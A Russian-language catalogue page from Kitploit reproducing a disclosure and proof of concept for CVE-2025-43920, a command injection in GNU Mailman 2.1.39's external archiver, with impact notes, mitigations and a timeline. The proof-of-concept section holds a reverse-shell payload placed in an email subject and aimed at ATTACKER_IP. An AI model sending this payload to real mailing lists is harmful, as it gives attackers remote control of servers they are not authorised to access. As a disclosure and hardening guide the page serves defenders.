Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-43920 — PoC и техническое описание для CVE-2025-43920, удаленной инъекции команд во внешнем архиваторе GNU Mailman 2.1.39, позволяющей неаутентифицированное выполнение кода через специально созданные темы писем. | Kitploit
Инструменты/GitHubGitHub/0nyx-my7h/cve-2025-43920
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеБезопасность Электронной Почты
GitHub0nyx-my7h/cve-2025-43920

CVE-2025-43920

PoC и техническое описание для CVE-2025-43920, удаленной инъекции команд во внешнем архиваторе GNU Mailman 2.1.39, позволяющей неаутентифицированное выполнение кода через специально созданные темы писем.

Репозиторий
1521 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-43920: Внедрение команд через тему письма в GNU Mailman 2.1.39 (пакет cPanel/WHM)

Обнаружено: Firudin Davudzada & Musazada Aydan
Дата раскрытия: Апрель 2025
CVE ID: CVE-2025-43920
Серьёзность: 5.4 Средняя (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N)
Тип атаки: Удалённая
Затрагиваемое ПО: GNU Mailman 2.1.39 (поставляется с cPanel/WHM)

Обзор

GNU Mailman 2.1.39, поставляемый с cPanel и WHM, уязвим к критической ошибке внедрения команд, которая позволяет неаутентифицированным злоумышленникам выполнять произвольные команды операционной системы. Уязвимость возникает, когда внешний архиватор настроен с использованием PUBLIC_EXTERNAL_ARCHIVER или PRIVATE_EXTERNAL_ARCHIVER в конфигурационном файле mm_cfg.py, а тема письма содержит метасимволы оболочки, которые не очищаются должным образом. Это может привести к полной компрометации системы, позволяя злоумышленникам устанавливать обратные оболочки, извлекать данные или выполнять другие вредоносные действия.

Детали уязвимости

  • Тип уязвимости: Внедрение команд
  • Вендор: GNU Mailman (GNU Mailman)
  • Затрагиваемые версии: Mailman 2.1.39; вероятно, затрагивает более старые версии 2.1.x (ожидается регрессионное тестирование)
  • Затрагиваемые компоненты:
    • Конфигурация внешнего архиватора (PUBLIC_EXTERNAL_ARCHIVER, PRIVATE_EXTERNAL_ARCHIVER)
    • Mailman/Handlers/ (логика обработки темы письма, потенциально включающая такие файлы, как CookHeaders.py)
  • Коренная причина: Когда внешний архиватор настроен, тема письма может передаваться в команду оболочки без надлежащей очистки, что позволяет выполнять произвольные команды, если присутствуют метасимволы оболочки (например, ;, &, |).
  • Статус: Официального исправления нет. Mailman 2.1.x достиг конца жизненного цикла (EOL); настоятельно рекомендуется миграция на Mailman 3.x.

Доказательство концепции

Для эксплуатации этой уязвимости злоумышленник может отправить письмо в список рассылки, управляемый Mailman, с вредоносной темой, например:

root@kitploit:~
Subject: ;bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

Предварительные условия:

  • Целевой список Mailman должен иметь внешний архиватор, настроенный через PUBLIC_EXTERNAL_ARCHIVER или PRIVATE_EXTERNAL_ARCHIVER.
  • Злоумышленник должен контролировать почтовый сервер или клиент, способный отправлять письма в целевой список.
  • Слушатель (например, netcat) должен быть настроен на ATTACKERIP:4444 для получения обратной оболочки.

Ожидаемый результат: Если команда внешнего архиватора не очищает тему письма, вредоносная команда выполняется на сервере, устанавливая обратную оболочку на сервер злоумышленника.

Векторы атак

  • Основной вектор: Вредоносные темы писем, содержащие метасимволы оболочки, отправленные в список рассылки, управляемый Mailman, с настроенным внешним архиватором.
  • Сценарии эксплуатации:
    • Установка обратных оболочек для постоянного доступа.
    • Выполнение команд для извлечения данных, изменения конфигураций или установки вредоносного ПО.
    • Связывание с другими уязвимостями для усиления атак.
  • Простота эксплуатации: Высокая, так как любой отправитель письма может атаковать публичные или неправильно настроенные списки с внешним архиватором.

Влияние на безопасность

  • Выполнение кода: Высокое (произвольное выполнение команд ОС).
  • Повышение привилегий: Высокое (потенциальный доступ root в зависимости от привилегий выполнения Mailman).
  • Раскрытие информации: Высокое (вывод команд может раскрыть системные данные).
  • Отказ в обслуживании: Высокий (вредоносные команды могут привести к сбою или перегрузке сервера).

Смягчающие меры

Немедленные действия

  • Отключение внешних архиваторов: Установите PUBLIC_EXTERNAL_ARCHIVER и PRIVATE_EXTERNAL_ARCHIVER в None в mm_cfg.py, чтобы отключить функциональность внешнего архиватора:

    root@kitploit:~
    PUBLIC_EXTERNAL_ARCHIVER = None
    PRIVATE_EXTERNAL_ARCHIVER = None
    
  • Очистка ввода: Если внешний архиватор необходим, убедитесь, что команда очищает тему письма для предотвращения внедрения метасимволов оболочки.

  • Ограничение подписок: Ограничьте подписки на список рассылки доверенными пользователями для уменьшения риска.

Долгосрочные решения

  • Обновление до Mailman 3.x: Перейдите на Mailman 3.x, который реализует надёжную очистку ввода и активно поддерживается.
  • Отключение обработки писем: Если не требуется, отключите функциональность обработки писем Mailman, чтобы устранить вектор атаки.
  • Укрепление среды: Запускайте Mailman в контейнерной среде с минимальными привилегиями, чтобы ограничить влияние потенциальных эксплойтов.

Временная шкала

  • Q1 2025: Обнаружено в ходе авторизованного тестирования на проникновение.
  • Q1 2025: Сообщено разработчикам GNU Mailman и cPanel.
  • Апрель 2025: CVE присвоен MITRE.
  • Апрель 2025: Публичное раскрытие через этот репозиторий.

Ссылки

  • Исходный код Mailman 2.1
  • Запись CVE-2025-43920
  • Рекомендации по безопасности Mailman
  • INCIBE-CERT - CVE-2025-43920
  • VULDB - CVE-2025-43920
  • National Institute of Standards and Technology (NIST) - CVE-2025-43920
  • Tenable - CVE-2025-43920

Благодарности

Firudin Davudzada и Musazada Aydan ответственно раскрыли эту уязвимость в ходе санкционированного тестирования на проникновение. Спасибо команде MITRE CVE за координацию.

Контакты

Электронная почта: [email protected]\

Скачать инструмент